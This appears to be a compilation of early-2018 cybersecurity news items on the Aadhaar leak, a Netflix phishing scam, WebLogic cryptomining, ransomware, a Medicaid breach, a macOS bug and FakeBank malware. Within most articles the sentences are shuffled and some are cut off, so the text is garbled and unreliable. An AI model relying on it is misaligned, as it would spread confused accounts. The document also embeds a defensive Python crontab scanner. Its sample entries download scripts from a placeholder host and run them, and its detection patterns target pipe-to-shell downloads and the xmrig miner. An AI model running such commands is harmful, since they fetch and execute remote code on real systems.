Despite UIDAI denial, leaked Aadhaar demographic data is a goldmine for criminals, say experts
The news report in The Tribune newspaper that exposed the security breach said that it took a reporter only Rs 500 and 10 minutes to access the entire Aadhaar database and its trove of demographic details – such as names, addresses, postal codes, phone numbers, photographs and e-mail addresses of people enrolled in the programme. Another form of phishing is when criminals send their targets emails or text messages disguised to look like they are from a reliable source, but which include links to malicious websites designed to give the criminal access to the victim’s electronic devices and the security-related data they contain. One of the forms social engineering takes is phishing, a process in which criminals phone their targets pretending to be credible persons like bank officials and get them to reveal confidential information. “Demographic data is largely private data and there is a tremendous amount of risk associated with the unauthorised access of such data,” he said. “If demographic information of such a massive scale has been exposed, imagine the sample size of data that such criminals can [now] use to evaluate the behaviour of their targets as part of the social engineering process,” said Chaudhary. Resource for criminals Despite the Unique Identification Authority of India claim that individual security could not be compromised by unauthorised access of the sort reported by the Tribune, Pavan Duggal, a lawyer who specialises in cybersecurity, disagreed. Chaudhary explained that criminals usually initiate financial fraud via a tactic known as social engineering in which they attempt to manipulate people on the phone or online to reveal confidential information such as passwords or bank details. “It is a goldmine for criminals, in both physical and virtual spaces, who can target any individual through such private data.” Duggal added: “The availability of demographic data eventually leads to the violation of the right to privacy.
It can also act as fodder for groups indulging in financial frauds.”
Aadhaar based on flawed technology, prone to data breach, SC told
The December interim order had come on pleas for the stay on various notifications issued by the government making Aadhaar-linking mandatory with 139 various services and schemes. Menon submitted that it gave rise to “surveillance, breach of privacy and identity theft of individuals” in violation of their right to equality, right to freedom and right to privacy. Filed ahead of the January 17 Constitution Bench hearing of petitions challenging the validity of the Aadhaar Act, the affidavit cited research done by various experts and RTI replies to suggest that the scheme was flawed. While choosing not to stay the government’s orders and notifications on Aadhaar, it had fixed January 17 for final Constitution Bench hearing to decide the petitions challenging the validity of Aadhaar Act and related notifications. The order extending the deadline for linking of Aadhaar shall also be applicable to all state governments, besides the Central government and its departments, the top court had said. Amid rising concerns over violation of the right to privacy due to Aadhaar, a petitioner against the 12-digit unique biometric identification number has told the Supreme Court that it is based on a flawed technology, making it prone to a data breach. A five-judge Constitution Bench headed by Chief Justice of India Dipak Misra had said the deadline for Aadhaar-linking of mobile phone numbers stood extended from February 6, 2018, to March 31, 2018. The Supreme Court had on December 15 extended the deadline for linking of Aadhaar for all services and schemes, including mobile phone numbers, to March 31 next year. “These data breaches are in flagrant violation of Section 29 of the Aadhaar Act read with Regulations 6 and 7 of the Aadhaar (Sharing of Information) Regulations, 2016,” writer-activist Kalyani Shankar Menon said in her rejoinder affidavit.
“It is submitted that Aadhaar is an insecure, unreliable, unnecessary and inappropriate technology project which is being foisted with coercion on the most vulnerable section of Indians and is threatening their constitutional and legal rights and entitlements every day,” the affidavit read.
Watch out for this Netflix phishing scam that will steal your credit card details
Netflix users are being warned to avoid clicking on any suspicious email links after a phishing scam was uncovered, which security experts say is designed to steal credit card details. Found by Australian cybersecurity firm MailGuard, and shared on Twitter by the New South Wales police, the fake emails use convincing social engineering tactics – including the official Netflix website layout – in an attempt to dupe recipients into entering financial details. An ‘update payment’ button in the email, if clicked, will lead to a phishing site with bogus Netflix branding. Unfortunately, these scams are common on the internet and target popular brands such as Netflix and other companies with large customer bases to lure users into giving out personal information. If you’re unsure if you’re visiting our legitimate Netflix website, type www. au in a statement: “We take the security of our members’ accounts seriously and Netflix employs numerous proactive measures to detect fraudulent activity to keep the Netflix service and our members’ accounts secure.” It states: “Never enter your login or financial details after following a link in an email or text message.” “Netflix has become a favourite vehicle for email fraudsters,” MailGuard’s Emmanuel Marshall wrote in a blog post on Wednesday (10 January). Phishing can be enormously costly and destructive, and new scams are appearing every day. Any card details entered will be sent directly to the hackers.
Hackers exploit critical Oracle WebLogic flaw to secretly mine cryptocurrency worldwide
Multiple hackers are exploiting a web server vulnerability that was patched by Oracle late last year to secretly mine thousands of dollars worth of cryptocurrency, security researchers have found. According to a report published by the SANS Technology Institute, Morphus Labs researcher Renato Marinho said the easily exploitable Oracle WebLogic vulnerability, dubbed CVE-2017-10271, was fixed in October last year but continues to be exploited on systems which have not installed the patch. The attacks are thought to have begun after Chinese security researcher Lian Zhang published a proof-of-concept exploit in December, Johannes B Ullrich, dean of research at the SANS Technology Institute, said in a follow-up post. WebLogic and PeopleSoft servers that have still not installed the patch are being targeted in this attack. Researchers said the xmrig mining software was found on 722 vulnerable WebLogic and PeopleSoft systems. Once the exploit was published, anybody with limited scripting skills was able to participate in taking down WebLogic/PeopleSoft servers. “Your server was vulnerable to an easily executed remote code execution exploit,” he said. One attacker has already managed to mine 611 Monero coins ($242,762, £179,411 at current rates) so far, researchers said. In this attack, a simple bash script is used to find a working directory, kill any existing cryptominers on the targeted system and set up a CRON job to download and launch the new miner. They also noted the attacks were launched from different locations across the globe, with many of the affected servers hosted by major cloud service providers such as Amazon Web Services, Digital Ocean, Google Cloud, Microsoft Azure, Oracle Cloud and OVH.
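A defender's check for the cron persistence described above, as an added example that is not from the SANS report or the article: it flags crontab entries that download and run remote content, reference xmrig, or execute from world-writable directories. The sample crontab, the rule names and the patterns are constructed assumptions.

```python
import re

# Constructed sample crontab (not taken from any real incident).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://example.invalid/placeholder.sh | bash
@reboot /tmp/.cache/xmrig --config=/tmp/.cache/c.json
30 4 * * 0 wget -q -O /var/tmp/u http://example.invalid/u && sh /var/tmp/u
15 1 * * * /usr/bin/wget -q -O /srv/mirror/index.html https://example.invalid/index.html
"""

# Heuristic rules (assumptions for this example; tune for your environment).
RULES = [
    ("download piped to shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")),
    ("download then execute",
     re.compile(r"\b(curl|wget)\b.*(&&|;)\s*(ba)?sh\s+\S+")),
    ("known miner name", re.compile(r"\bxmrig\b", re.IGNORECASE)),
    ("runs from world-writable dir",
     re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/\S+")),
]

def command_of(line):
    """Return the command part of a crontab entry, or None for
    comments, blank lines and environment assignments."""
    parts = line.strip().split()
    if not parts or parts[0].startswith("#"):
        return None
    if parts[0].startswith("@"):          # @reboot, @daily, ...
        return " ".join(parts[1:])
    if len(parts) < 6:                    # e.g. MAILTO=root
        return None
    return " ".join(parts[5:])            # skip the five schedule fields

def scan_crontab(text):
    """Return [(line_number, [rule names that matched]), ...]."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        cmd = command_of(line)
        if cmd is None:
            continue
        hits = [name for name, rx in RULES if rx.search(cmd)]
        if hits:
            findings.append((lineno, hits))
    return findings

if __name__ == "__main__":
    for lineno, hits in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {', '.join(hits)}")
```

The plain `wget` mirror job on the last sample line is not flagged, because it neither executes what it downloads nor writes to a world-writable path.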
Hackers hit traders in Old Delhi, demand Bitcoin as ransom
At least three traders in Old Delhi were hit by hackers who encrypted files on their computers and demanded ransom in Bitcoins to release documents critical to their businesses, police officers and victims said on Wednesday. Delhi Police’s crime branch has registered three FIRs so far, including one on January 5, but traders say the number could be much more as several ransoms paid in Bitcoins were not reported to authorities. A police officer said the free option was to demonstrate to the traders that the hackers had control. Police said the traders were given links to buy Bitcoins, with a warning that not complying with their demand would lead to the permanent loss of data. The traders were given the option of getting five files decrypted for free, and the rest after the ransom was paid. “Some traders paid in Bitcoins and got their data back.” Deputy commissioner of police (crime) Bhishma Singh confirmed the hackings but declined to give further details. Bitcoins are gaining in popularity as a digital payment mode but are not legal tender in India. When my data was hacked, I spoke to fellow traders and learnt that there were other such cases. “Getting money in Bitcoin works for them because it is difficult to trace the money,” said Jiten Jain, the director of cyber-security firm Voyager Infosec.
What is CoffeeMiner? New attack lets hackers hijack public WiFi networks to mine cryptocurrency
Florida hack exposes 30,000 Medicaid patients’ confidential records, medical conditions and diagnoses
Florida’s Agency for Health Care Administration said hackers may have accessed the personal and confidential information of up to 30,000 Medicaid patients, including their medical records, conditions and diagnoses. “The agency takes this matter very seriously and have taken steps to protect personal information and the Agency took swift action to help prevent this type of event from happening again,” the AHCA said. According to preliminary findings from the ongoing investigation, Medicaid enrollees’ full names, Medicaid ID numbers, dates of birth, addresses, Social Security numbers and medical conditions and diagnoses may have been partially or fully accessed in the breach. Although the review is ongoing, the agency believes that only approximately 6% of these individuals could be confirmed as having their Medicaid ID or social security numbers potentially accessed. The agency said it learned of the incident five days later on 20 November and notified the Inspector General who launched an investigation “to identify if any protected health information was potentially accessed.” In addition to a full review of AHCA data to determine the circumstances of the breach, the agency has initiated “new and ongoing security training” for employees to ensure proper security protocol and measures. It has also provided Medicaid recipients with an agency hotline number to call. The AHCA said no other agency systems or email accounts were involved in the phishing attack. However, the agency said it currently has “no reason to believe” that the information has been misused. The AHCA is currently notifying all potentially affected Medicaid enrollees and is “exploring additional security options to protect against further breaches.”
MacOS High Sierra security bug lets you unlock App Store System Preferences with any random password
Yet another password security flaw has been found affecting macOS High Sierra for the second time in three months. If it is unlocked, lock it and then try unlocking it using your username and any password. Although this vulnerability is not as serious as earlier password bugs plaguing High Sierra, it could potentially allow a malicious actor to disable automatic security updates on the device and exploit any bugs and vulnerabilities that would otherwise be regularly patched. The bug report also highlights yet another embarrassing password-related bug for Apple. 2 – that allows any user to unlock the App Store menu in System Preferences using any random password in less than five steps, MacRumors first reported. A bug report on Open Radar submitted earlier this week detailed a security flaw found in the current version of macOS High Sierra – version 10. In November last year, a serious “root” flaw was discovered in macOS High Sierra that allowed anyone to log into the admin account simply by using the username “root” with a blank password after repeatedly clicking on the login button multiple times. According to the bug report, users can simply open System Preferences, go to App Store settings and check the padlock icon. Using this preference pane, users can choose to enable or disable automatic downloads and installation of OS security updates among other things. We greatly regret this error and we apologize to all Mac users, both for releasing with this vulnerability and for the concern it has caused.
What is FakeBank? New banking malware can intercept SMS messages to steal sensitive data and funds
After the malware is installed, the icon appears on the device screen and requests admin privileges from the user. “FakeBank also stops the user from opening the target bank’s legitimate app, to prevent any modifications to the relationship between the bank card number and your phone number,” the researchers said. Security researchers have discovered a mobile malware strain that can intercept users’ sensitive SMS messages to steal their banking details and funds. FakeBank can also steal sensitive information from the device including users’ phone numbers, a list of banking apps installed, the balance on a linked bank card and location data. Since many users link their bank accounts to their phones and opt to receive text notifications, the malware can take over these messages to steal sensitive bank account information, such as security code messages. Most significantly, all this access to the device’s SMS gives the malware an avenue to silently steal money from users’ bank account. The researchers have observed the malware targeting customers of numerous Russian financial institutions such as Sberbank, Leto Bank and VTB24 Bank. The researchers observed some samples of the malware requesting admin privileges from the user, therefore allowing the malicious app further access to the compromised device. “The malware intercepts SMS in a scheme to steal funds from infected users through their mobile banking systems,” Trend Micro said in a blog post published on Wednesday (10 January). Besides controlling the device’s open and close network function, the malicious app can quietly connect to the internet and send the stolen information to its command and control server (C&C) without the user’s knowledge. To ensure it carries out its malicious activities successfully, the malware prevents users from opening device settings “likely to prevent installation”, the researchers said.
It also inspects the device for any anti-virus software and quietly exits without doing anything if it does find one.
Hyderabad: India 5th in cyber fraud vulnerability
The world lost $3 trillion to cyber fraud in 2016, and India is ranked fifth among the most vulnerable countries, while the USA tops the list. Nilesh Kumar, the research scholar in cybersecurity, said that data leaks like Aadhaar, bank account and other personally identifiable information are going to grow as long as different institutions that store personal data don’t secure it. Umesh Thota, CEO, AuthBase, a cyber expert, said, “Every company in the US and other countries has a portion of its IT budget allocated to cybersecurity.” The Union home ministry and state governments are spending money on training personnel to carry out digital investigations, as a survey by an international agency has estimated that the damage due to cyber fraud is likely to increase to $6 trillion by 2021. There are numerous perpetrators of cybercrime, from full-fledged gangs to individuals trying to poach identification and security details of a largely unaware and ignorant Indian audience. Data is also harvested by fake sites purporting to be e-commerce sites. Unless people use secure mail gateways, their conversations can be eavesdropped and eventually this can be used to cheat people of their money. Secondly, ignorance is one of the major reasons why cybercrime is so high in India. To deal with cyber crimes, the Telangana home department is training personnel in ‘Digital investigation’. CCTV probing and data security are also part of the training module.